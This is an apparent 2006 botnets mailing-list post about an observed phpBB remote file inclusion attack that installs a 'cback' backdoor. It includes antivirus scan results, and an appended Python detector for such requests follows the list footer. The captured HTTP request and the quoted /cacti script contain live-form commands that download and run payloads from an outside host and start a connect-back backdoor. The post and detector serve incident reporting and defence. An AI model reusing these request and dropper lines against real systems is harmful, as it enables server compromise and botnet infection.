To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

Hello list,

I see a lot of these "massdefacer by r3v3ng3s" attacks in my IDS sensors. More often than not they are wget'ing the "cback" back door from somewhere else. (Of course these IP numbers and packages change on a nearly daily basis.)

The current cback package gets analyzed by VirusTotal as:

    Antivirus            Version          Update      Result
    AntiVir              6.34.0.53        03.20.2006  Linux/Small.AM
    Avast                4.6.695.0        03.17.2006  no virus found
    AVG                  386              03.20.2006  no virus found
    Avira                6.34.0.53        03.20.2006  Linux/Small.AM
    BitDefender          7.2              03.20.2006  no virus found
    CAT-QuickHeal        8.00             03.20.2006  no virus found
    ClamAV               devel-20060126   03.20.2006  no virus found
    DrWeb                4.33             03.20.2006  no virus found
    eTrust-InoculateIT   23.71.106        03.19.2006  no virus found
    eTrust-Vet           12.4.2126        03.20.2006  no virus found
    Ewido                3.5              03.20.2006  Backdoor.Small.am
    Fortinet             2.71.0.0         03.20.2006  Linux/Small.AM!bdr
    F-Prot               3.16c            03.20.2006  no virus found
    Ikarus               0.2.59.0         03.20.2006  Backdoor.Linux.Small.AM
    Kaspersky            4.0.2.24         03.20.2006  Backdoor.Linux.Small.am
    McAfee               4722             03.20.2006  no virus found
    NOD32v2              1.1452           03.20.2006  Linux/Small.AM
    Norman               5.70.10          03.20.2006  no virus found
    Panda                9.0.0.4          03.20.2006  no virus found
    Sophos               4.03.0           03.20.2006  no virus found
    Symantec             8.0              03.20.2006  Hacktool
    TheHacker            5.9.6.116        03.20.2006  no virus found
    UNA                  1.83             03.20.2006  Backdoor.Linux.Small
    VBA32                3.10.5           03.19.2006  no virus found

The host being referenced for these files is active, packet dump to follow:

    GET /phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo|  HTTP/1.1
    Host: 63.99.219.121
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

The files are in /cback, /cacti and /cmd.dat.

  /cmd.dat is the mass defacer
  /cback is a backdoor (bot?)
  /cacti is as follows:

    #!/bin/bash
    wget 83.16.187.6/cback
    chmod 744 cback
    ./cback 209.200.224.165 8080&

The 208.x.x.x server has a place holder page up and is hosted by:

    OrgName:    ADDD2NET COM INC DBA LUNARPAGES
    OrgID:      ACIDL
    Address:    Add2Net, Inc.
    Address:    Lunarpages Division
    Address:    100 East La Habra Blvd.
    City:       La Habra
    StateProv:  CA
    PostalCode: 90631
    Country:    US
    NetRange:   209.200.224.0 - 209.200.239.255

Like I said, I see a lot of these with slight variations in the packages, sometimes with .pl bot code etc. It looks like the attack includes the massdefacer script and a backdoor/bot. I know you guys have seen this sort of thing as well, any comments?

thanks,
bf

_______________________________________________
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
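The request in the packet dump above is a remote file inclusion against phpBB's admin_styles.php, with phpbb_root_path pointed at an off-host URL and a download-and-run chain in a second parameter. The following is an added detection example (not code from the post or the list): it decodes such a request line, flags an RFI-prone parameter that carries a remote scheme, flags any parameter holding a shell chain, and pulls out the host serving the payload. The RFI_PARAMS watch-list beyond phpbb_root_path and the sample request, rebuilt from the decode above, are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Parameters known to be abused for remote file inclusion; the post shows
# phpbb_root_path, the others are assumed additions for illustration.
RFI_PARAMS = {"phpbb_root_path", "page", "file", "include"}
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# Download/run chains as in the post: shell separators plus fetch/chmod verbs.
SHELL_CHAIN = re.compile(r"[;|`]|\b(wget|curl|chmod|fetch)\b", re.IGNORECASE)

# Constructed sample, rebuilt from the ASCII decode in the post (LF line ends,
# as in the original dump).
SAMPLE_REQUEST = (
    "GET /phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?"
    "&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;"
    "echo%20YYY;echo|  HTTP/1.1\n"
    "Host: 63.99.219.121\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)\n\n"
)

def parse_query(target: str) -> dict:
    """Decode the request target into key/value pairs, splitting only on '&'
    so that ';' inside a command chain survives as part of the value."""
    _, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)
    return params

def analyze_request(raw: str) -> dict:
    """Flag a request whose RFI-prone parameter points off-host and/or whose
    query carries a shell download-and-execute chain."""
    request_line = raw.splitlines()[0]
    _method, target = request_line.split()[:2]   # tolerates the doubled space
    params = parse_query(target)
    remote_includes = {k: v for k, v in params.items()
                       if k in RFI_PARAMS and REMOTE_SCHEME.match(v)}
    shell_chains = {k: v for k, v in params.items() if SHELL_CHAIN.search(v)}
    # The hosts serving the included file are the ones to block or alert on.
    payload_hosts = sorted({urlsplit(v).hostname for v in remote_includes.values()})
    return {
        "path": target.partition("?")[0],
        "remote_includes": remote_includes,
        "shell_chains": shell_chains,
        "payload_hosts": payload_hosts,
        "suspicious": bool(remote_includes) or bool(shell_chains),
    }

if __name__ == "__main__":
    print(analyze_request(SAMPLE_REQUEST))
```

Run over raw request lines from an IDS or web log, the payload_hosts field gives the fetch hosts worth adding to an egress blocklist, which is where the wget in /cacti can be stopped.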
